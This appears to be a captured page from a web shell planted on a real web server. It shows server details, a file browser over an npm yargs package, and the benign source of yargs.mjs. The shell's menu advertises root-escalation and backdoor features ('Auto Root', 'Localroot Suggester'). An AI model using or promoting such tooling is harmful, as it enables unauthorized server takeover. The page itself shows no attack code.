Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
node_modules /
yargs /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
build
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
helpers
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
lib
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
locales
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
LICENSE
1.12
KB
-rw-r--r--
2025-10-09 13:40
README.md
5.83
KB
-rw-r--r--
2025-10-09 13:40
browser.d.ts
134
B
-rw-r--r--
2025-10-09 13:40
browser.mjs
232
B
-rw-r--r--
2025-10-09 13:40
index.cjs
1.42
KB
-rw-r--r--
2025-10-09 13:40
index.mjs
231
B
-rw-r--r--
2025-10-09 13:40
package.json
3.02
KB
-rw-r--r--
2025-10-09 13:40
yargs
457
B
-rw-r--r--
2025-10-09 13:40
yargs.mjs
473
B
-rw-r--r--
2025-10-09 13:40
Save
Rename
// TODO: consolidate on using a helpers file at some point in the future, which // is the approach currently used to export Parser and applyExtends for ESM: import pkg from './build/index.cjs'; const {applyExtends, cjsPlatformShim, Parser, processArgv, Yargs} = pkg; Yargs.applyExtends = (config, cwd, mergeExtends) => { return applyExtends(config, cwd, mergeExtends, cjsPlatformShim); }; Yargs.hideBin = processArgv.hideBin; Yargs.Parser = Parser; export default Yargs;